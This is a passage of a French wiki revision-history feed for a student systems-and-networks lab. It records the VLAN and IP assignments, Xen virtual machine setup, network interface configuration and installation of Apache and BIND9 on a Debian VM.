Une fois la connexion sur notre machine établie, nous devons changer le fichier &amp;lt;i&amp;gt;interfaces&amp;lt;/i&amp;gt; pour permettre une connexion à internet:&lt;br /&gt;
&amp;lt;pre&amp;gt;# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
        address 193.48.57.181&lt;br /&gt;
        netmask 255.255.255.240&lt;br /&gt;
        gateway 193.48.57.190&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis pour prendre en compte ses modifications nous utilisons :&lt;br /&gt;
&amp;lt;pre&amp;gt;ifdown&lt;br /&gt;
ifup&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install vim &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du service internet ==&lt;br /&gt;
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt; Installation du serveur HTTP &amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install apache2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;b&amp;gt; Installation du serveur DNS &amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install bind9 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si cette installation vous indique une erreur, il faut modifier le fichier  &amp;lt;i&amp;gt;/etc/apt/apt.conf.d/01proxy&amp;lt;/i&amp;gt;&lt;br /&gt;
et remplacer &lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://proxy.polytech-lille.fr:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
par&lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://helfaut.escaut.net:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette modification est du a la modification du proxy de l'école.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Configuration de notre nom de domaine&amp;lt;/b&amp;gt;&lt;br /&gt;
Après l'achat de notre nom de domaine &amp;lt;i&amp;gt;orelsan.website&amp;lt;/i&amp;gt;&lt;/div&gt;</summary>
		<author><name>Jturut</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35628</id>
		<title>TP sysres IMA2a5 2016/2017 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35628"/>
				<updated>2016-12-05T15:25:13Z</updated>
		
		<summary type="html">&lt;p&gt;Jturut : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{| class=&amp;quot;wikitable centre&amp;quot; width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! scope=col | N° VLAN&lt;br /&gt;
! scope=col | Prénom&lt;br /&gt;
! scope=col | Réseau local&lt;br /&gt;
! scope=col | Nom VM&lt;br /&gt;
! scope=col | @IP VM &lt;br /&gt;
|-&lt;br /&gt;
| VLAN20        &lt;br /&gt;
| Dimitri          &lt;br /&gt;
| 10.60.20.0/24&lt;br /&gt;
| Vald&lt;br /&gt;
|193.48.57.182/28&lt;br /&gt;
|-&lt;br /&gt;
|VLAN21           &lt;br /&gt;
| Nabil         &lt;br /&gt;
| 10.60.21.0/24&lt;br /&gt;
| Pnl&lt;br /&gt;
|193.48.57.177/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN22&lt;br /&gt;
| Otmane              &lt;br /&gt;
| 10.60.22.0/24&lt;br /&gt;
| Lartiste&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN23  &lt;br /&gt;
| Hugo               &lt;br /&gt;
| 10.60.23.0/24 &lt;br /&gt;
| Gradur&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN24 &lt;br /&gt;
| Clement              &lt;br /&gt;
| 10.60.24.0/24 &lt;br /&gt;
| Gringe&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN25   &lt;br /&gt;
| Joan            &lt;br /&gt;
| 10.60.25.0/24 &lt;br /&gt;
| Orelsan&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés Cisco ==&lt;br /&gt;
&lt;br /&gt;
== Installation d'une machine virtuelle ==&lt;br /&gt;
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.&lt;br /&gt;
Pour créer la machine virtuel, on tape la commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt; xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier &amp;lt;i&amp;gt;orelsan.cfg&amp;lt;/i&amp;gt; en remplaçant la version 3.14 en 3.16.0 &lt;br /&gt;
&amp;lt;pre&amp;gt; kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
 extra       = 'elevator=noop'&lt;br /&gt;
 ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lancement de notre machine virtuelle &lt;br /&gt;
&amp;lt;pre&amp;gt; xl create Orelsan.cvg &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Connection à notre machine virtuelle&lt;br /&gt;
&amp;lt;pre&amp;gt; xl console Orelsan &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :&lt;br /&gt;
&amp;lt;pre&amp;gt; xl list &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois la connexion sur notre machine établie, nous devons changer le fichier &amp;lt;i&amp;gt;interfaces&amp;lt;/i&amp;gt; pour permettre une connexion à internet:&lt;br /&gt;
&amp;lt;pre&amp;gt;# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
        address 193.48.57.181&lt;br /&gt;
        netmask 255.255.255.240&lt;br /&gt;
        gateway 193.48.57.190&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis pour prendre en compte ses modifications nous utilisons :&lt;br /&gt;
&amp;lt;pre&amp;gt;ifdown&lt;br /&gt;
ifup&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install vim &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du service internet ==&lt;br /&gt;
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt; Installation du serveur HTTP &amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install apache2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;b&amp;gt; Installation du serveur DNS &amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install bind9 &amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Jturut</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35627</id>
		<title>TP sysres IMA2a5 2016/2017 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35627"/>
				<updated>2016-12-05T15:24:35Z</updated>
		
		<summary type="html">&lt;p&gt;Jturut : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{| class=&amp;quot;wikitable centre&amp;quot; width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! scope=col | N° VLAN&lt;br /&gt;
! scope=col | Prénom&lt;br /&gt;
! scope=col | Réseau local&lt;br /&gt;
! scope=col | Nom VM&lt;br /&gt;
! scope=col | @IP VM &lt;br /&gt;
|-&lt;br /&gt;
| VLAN20        &lt;br /&gt;
| Dimitri          &lt;br /&gt;
| 10.60.20.0/24&lt;br /&gt;
| Vald&lt;br /&gt;
|193.48.57.182/28&lt;br /&gt;
|-&lt;br /&gt;
|VLAN21           &lt;br /&gt;
| Nabil         &lt;br /&gt;
| 10.60.21.0/24&lt;br /&gt;
| Pnl&lt;br /&gt;
|193.48.57.177/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN22&lt;br /&gt;
| Otmane              &lt;br /&gt;
| 10.60.22.0/24&lt;br /&gt;
| Lartiste&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN23  &lt;br /&gt;
| Hugo               &lt;br /&gt;
| 10.60.23.0/24 &lt;br /&gt;
| Gradur&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN24 &lt;br /&gt;
| Clement              &lt;br /&gt;
| 10.60.24.0/24 &lt;br /&gt;
| Gringe&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN25   &lt;br /&gt;
| Joan            &lt;br /&gt;
| 10.60.25.0/24 &lt;br /&gt;
| Orelsan&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés Cisco ==&lt;br /&gt;
&lt;br /&gt;
== Installation d'une machine virtuelle ==&lt;br /&gt;
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.&lt;br /&gt;
Pour créer la machine virtuel, on tape la commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt; xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier &amp;lt;i&amp;gt;orelsan.cfg&amp;lt;/i&amp;gt; en remplaçant la version 3.14 en 3.16.0 &lt;br /&gt;
&amp;lt;pre&amp;gt; kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
 extra       = 'elevator=noop'&lt;br /&gt;
 ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lancement de notre machine virtuelle &lt;br /&gt;
&amp;lt;pre&amp;gt; xl create Orelsan.cvg &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Connection à notre machine virtuelle&lt;br /&gt;
&amp;lt;pre&amp;gt; xl console Orelsan &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :&lt;br /&gt;
&amp;lt;pre&amp;gt; xl list &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois la connexion sur notre machine établie, nous devons changer le fichier &amp;lt;i&amp;gt;interfaces&amp;lt;/i&amp;gt; pour permettre une connexion à internet:&lt;br /&gt;
&amp;lt;pre&amp;gt;# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
        address 193.48.57.181&lt;br /&gt;
        netmask 255.255.255.240&lt;br /&gt;
        gateway 193.48.57.190&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis pour prendre en compte ses modifications nous utilisons :&lt;br /&gt;
&amp;lt;pre&amp;gt;ifdown&lt;br /&gt;
ifup&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install vim &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du service internet ==&lt;br /&gt;
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP&lt;br /&gt;
&amp;lt;b&amp;gt; Installation du serveur HTTP &amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install apache2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;b&amp;gt; Installation du serveur DNS &amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install bind9 &amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Jturut</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35626</id>
		<title>TP sysres IMA2a5 2016/2017 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35626"/>
				<updated>2016-12-05T15:16:13Z</updated>
		
		<summary type="html">&lt;p&gt;Jturut : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{| class=&amp;quot;wikitable centre&amp;quot; width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! scope=col | N° VLAN&lt;br /&gt;
! scope=col | Prénom&lt;br /&gt;
! scope=col | Réseau local&lt;br /&gt;
! scope=col | Nom VM&lt;br /&gt;
! scope=col | @IP VM &lt;br /&gt;
|-&lt;br /&gt;
| VLAN20        &lt;br /&gt;
| Dimitri          &lt;br /&gt;
| 10.60.20.0/24&lt;br /&gt;
| Vald&lt;br /&gt;
|193.48.57.182/28&lt;br /&gt;
|-&lt;br /&gt;
|VLAN21           &lt;br /&gt;
| Nabil         &lt;br /&gt;
| 10.60.21.0/24&lt;br /&gt;
| Pnl&lt;br /&gt;
|193.48.57.177/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN22&lt;br /&gt;
| Otmane              &lt;br /&gt;
| 10.60.22.0/24&lt;br /&gt;
| Lartiste&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN23  &lt;br /&gt;
| Hugo               &lt;br /&gt;
| 10.60.23.0/24 &lt;br /&gt;
| Gradur&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN24 &lt;br /&gt;
| Clement              &lt;br /&gt;
| 10.60.24.0/24 &lt;br /&gt;
| Gringe&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN25   &lt;br /&gt;
| Joan            &lt;br /&gt;
| 10.60.25.0/24 &lt;br /&gt;
| Orelsan&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés Cisco ==&lt;br /&gt;
&lt;br /&gt;
== Installation d'une machine virtuelle ==&lt;br /&gt;
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.&lt;br /&gt;
Pour créer la machine virtuel, on tape la commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt; xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier &amp;lt;i&amp;gt;orelsan.cfg&amp;lt;/i&amp;gt; en remplaçant la version 3.14 en 3.16.0 &lt;br /&gt;
&amp;lt;pre&amp;gt; kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
 extra       = 'elevator=noop'&lt;br /&gt;
 ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lancement de notre machine virtuelle &lt;br /&gt;
&amp;lt;pre&amp;gt; xl create Orelsan.cvg &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Connection à notre machine virtuelle&lt;br /&gt;
&amp;lt;pre&amp;gt; xl console Orelsan &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :&lt;br /&gt;
&amp;lt;pre&amp;gt; xl list &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois la connexion sur notre machine établie, nous devons changer le fichier &amp;lt;i&amp;gt;interfaces&amp;lt;/i&amp;gt; pour permettre une connexion à internet:&lt;br /&gt;
&amp;lt;pre&amp;gt;# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
        address 193.48.57.181&lt;br /&gt;
        netmask 255.255.255.240&lt;br /&gt;
        gateway 193.48.57.190&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis pour prendre en compte ses modifications nous utilisons :&lt;br /&gt;
&amp;lt;pre&amp;gt;ifdown&lt;br /&gt;
ifup&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install vim &amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Jturut</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35625</id>
		<title>TP sysres IMA2a5 2016/2017 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35625"/>
				<updated>2016-12-05T15:14:06Z</updated>
		
		<summary type="html">&lt;p&gt;Jturut : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{| class=&amp;quot;wikitable centre&amp;quot; width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! scope=col | N° VLAN&lt;br /&gt;
! scope=col | Prénom&lt;br /&gt;
! scope=col | Réseau local&lt;br /&gt;
! scope=col | Nom VM&lt;br /&gt;
! scope=col | @IP VM &lt;br /&gt;
|-&lt;br /&gt;
| VLAN20        &lt;br /&gt;
| Dimitri          &lt;br /&gt;
| 10.60.20.0/24&lt;br /&gt;
| Vald&lt;br /&gt;
|193.48.57.182/28&lt;br /&gt;
|-&lt;br /&gt;
|VLAN21           &lt;br /&gt;
| Nabil         &lt;br /&gt;
| 10.60.21.0/24&lt;br /&gt;
| Pnl&lt;br /&gt;
|193.48.57.177/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN22&lt;br /&gt;
| Otmane              &lt;br /&gt;
| 10.60.22.0/24&lt;br /&gt;
| Lartiste&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN23  &lt;br /&gt;
| Hugo               &lt;br /&gt;
| 10.60.23.0/24 &lt;br /&gt;
| Gradur&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN24 &lt;br /&gt;
| Clement              &lt;br /&gt;
| 10.60.24.0/24 &lt;br /&gt;
| Gringe&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN25   &lt;br /&gt;
| Joan            &lt;br /&gt;
| 10.60.25.0/24 &lt;br /&gt;
| Orelsan&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés Cisco ==&lt;br /&gt;
&lt;br /&gt;
== Installation d'une machine virtuelle ==&lt;br /&gt;
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.&lt;br /&gt;
Pour créer la machine virtuel, on tape la commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt; xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier &amp;lt;i&amp;gt;orelsan.cfg&amp;lt;/i&amp;gt; en remplaçant la version 3.14 en 3.16.0 &lt;br /&gt;
&amp;lt;pre&amp;gt; kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
 extra       = 'elevator=noop'&lt;br /&gt;
 ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lancement de notre machine virtuelle &lt;br /&gt;
&amp;lt;pre&amp;gt; xl create Orelsan.cvg &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Connection à notre machine virtuelle&lt;br /&gt;
&amp;lt;pre&amp;gt; xl console Orelsan &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :&lt;br /&gt;
&amp;lt;pre&amp;gt; xl list &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois la connexion sur notre machine établie, nous devons changer le fichier &amp;lt;i&amp;gt;interfaces&amp;lt;/i&amp;gt; pour permettre une connexion à internet:&lt;br /&gt;
&amp;lt;pre&amp;gt;# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
        address 193.48.57.181&lt;br /&gt;
        netmask 255.255.255.240&lt;br /&gt;
        gateway 193.48.57.190&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis pour prendre en compte ses modifications nous utilisons :&lt;br /&gt;
&amp;lt;pre&amp;gt;ifdown&lt;br /&gt;
ifup&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Jturut</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35624</id>
		<title>TP sysres IMA2a5 2016/2017 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35624"/>
				<updated>2016-12-05T15:12:16Z</updated>
		
		<summary type="html">&lt;p&gt;Jturut : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{| class=&amp;quot;wikitable centre&amp;quot; width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! scope=col | N° VLAN&lt;br /&gt;
! scope=col | Prénom&lt;br /&gt;
! scope=col | Réseau local&lt;br /&gt;
! scope=col | Nom VM&lt;br /&gt;
! scope=col | @IP VM &lt;br /&gt;
|-&lt;br /&gt;
| VLAN20        &lt;br /&gt;
| Dimitri          &lt;br /&gt;
| 10.60.20.0/24&lt;br /&gt;
| Vald&lt;br /&gt;
|193.48.57.182/28&lt;br /&gt;
|-&lt;br /&gt;
|VLAN21           &lt;br /&gt;
| Nabil         &lt;br /&gt;
| 10.60.21.0/24&lt;br /&gt;
| Pnl&lt;br /&gt;
|193.48.57.177/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN22&lt;br /&gt;
| Otmane              &lt;br /&gt;
| 10.60.22.0/24&lt;br /&gt;
| Lartiste&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN23  &lt;br /&gt;
| Hugo               &lt;br /&gt;
| 10.60.23.0/24 &lt;br /&gt;
| Gradur&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN24 &lt;br /&gt;
| Clement              &lt;br /&gt;
| 10.60.24.0/24 &lt;br /&gt;
| Gringe&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN25   &lt;br /&gt;
| Joan            &lt;br /&gt;
| 10.60.25.0/24 &lt;br /&gt;
| Orelsan&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés Cisco ==&lt;br /&gt;
&lt;br /&gt;
== Installation d'une machine virtuelle ==&lt;br /&gt;
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.&lt;br /&gt;
Pour créer la machine virtuel, on tape la commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt; xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier &amp;quot;orelsan.cfg&amp;quot; en remplaçant la version 3.14 en 3.16.0 &lt;br /&gt;
&amp;lt;pre&amp;gt; kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
 extra       = 'elevator=noop'&lt;br /&gt;
 ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lancement de notre machine virtuelle &lt;br /&gt;
&amp;lt;pre&amp;gt; xl create Orelsan.cvg &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Connection à notre machine virtuelle&lt;br /&gt;
&amp;lt;pre&amp;gt; xl console Orelsan &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :&lt;br /&gt;
&amp;lt;pre&amp;gt; xl list &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois la connexion sur notre machine établie, nous devons changer le fichier interfaces pour permettre une connexion à internet:&lt;br /&gt;
&amp;lt;pre&amp;gt;# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
        address 193.48.57.181&lt;br /&gt;
        netmask 255.255.255.240&lt;br /&gt;
        gateway 193.48.57.190&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis pour prendre en compte ses modifications nous utilisons :&lt;br /&gt;
&amp;lt;pre&amp;gt;ifdown&lt;br /&gt;
ifup&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Jturut</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35623</id>
		<title>TP sysres IMA2a5 2016/2017 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35623"/>
				<updated>2016-12-05T14:53:40Z</updated>
		
		<summary type="html">&lt;p&gt;Jturut : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{| class=&amp;quot;wikitable centre&amp;quot; width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! scope=col | N° VLAN&lt;br /&gt;
! scope=col | Prénom&lt;br /&gt;
! scope=col | Réseau local&lt;br /&gt;
! scope=col | Nom VM&lt;br /&gt;
! scope=col | @IP VM &lt;br /&gt;
|-&lt;br /&gt;
| VLAN20        &lt;br /&gt;
| Dimitri          &lt;br /&gt;
| 10.60.20.0/24&lt;br /&gt;
| Vald&lt;br /&gt;
|193.48.57.182/28&lt;br /&gt;
|-&lt;br /&gt;
|VLAN21           &lt;br /&gt;
| Nabil         &lt;br /&gt;
